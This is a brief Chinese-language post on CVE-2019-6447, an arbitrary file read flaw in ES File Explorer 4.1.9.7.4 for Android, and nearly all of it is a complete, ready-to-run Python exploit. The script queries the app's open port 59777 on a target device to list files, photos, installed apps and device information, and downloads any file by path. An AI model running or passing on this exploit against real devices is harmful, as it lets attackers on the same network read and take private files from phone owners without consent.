ES文件浏览器4.1.9.7.4任意文件浏览漏洞
ES文件浏览器是一款安卓系统常用的文件管理器,有文件管理、HTTP服务等多种功能
在v4.1.9.7.4版本下有个任意文件读取漏洞
exp:
# Exploit Title: ES File Explorer 4.1.9.7.4 - Arbitrary File Read # Date: 29/06/2021 # Exploit Author: Nehal Zaman # Version: ES File Explorer v4.1.9.7.4 # Tested on: Android # CVE : CVE-2019-6447 import requests import json import ast import sys if len(sys.argv) < 3: print(f"USAGE {sys.argv[0]} <command> <IP> [file to download]") sys.exit(1) url = 'http://' + sys.argv[2] + ':59777' cmd = sys.argv[1] cmds = ['listFiles','listPics','listVideos','listAudios','listApps','listAppsSystem','listAppsPhone','listAppsSdcard','listAppsAll','getFile','getDeviceInfo'] listCmds = cmds[:9] if cmd not in cmds: print("[-] WRONG COMMAND!") print("Available commands : ") print(" listFiles : List all Files.") print(" listPics : List all Pictures.") print(" listVideos : List all videos.") print(" listAudios : List all audios.") print(" listApps : List Applications installed.") print(" listAppsSystem : List System apps.") print(" listAppsPhone : List Communication related apps.") print(" listAppsSdcard : List apps on the SDCard.") print(" listAppsAll : List all Application.") print(" getFile : Download a file.") print(" getDeviceInfo : Get device info.") sys.exit(1) print("\n==================================================================") print("| ES File Explorer Open Port Vulnerability : CVE-2019-6447 |") print("| Coded By : Nehal a.k.a PwnerSec |") print("==================================================================\n") header = {"Content-Type" : "application/json"} proxy = {"http":"http://127.0.0.1:8080", "https":"https://127.0.0.1:8080"} def httpPost(cmd): data = json.dumps({"command":cmd}) response = requests.post(url, headers=header, data=data) return ast.literal_eval(response.text) def parse(text, keys): for dic in text: for key in keys: print(f"{key} : {dic[key]}") print('') def do_listing(cmd): response = httpPost(cmd) if len(response) == 0: keys = [] else: keys = list(response[0].keys()) parse(response, keys) if cmd in listCmds: do_listing(cmd) elif cmd == cmds[9]: if len(sys.argv) != 4: print("[+] Include file name to download.") sys.exit(1) elif sys.argv[3][0] != '/': print("[-] You need to provide full path of the file.") sys.exit(1) else: path = sys.argv[3] print("[+] Downloading file...") response = requests.get(url + path) with open('out.dat','wb') as wf: wf.write(response.content) print("[+] Done. Saved as `out.dat`.") elif cmd == cmds[10]: response = httpPost(cmd) keys = list(response.keys()) for key in keys: print(f"{key} : {response[key]}")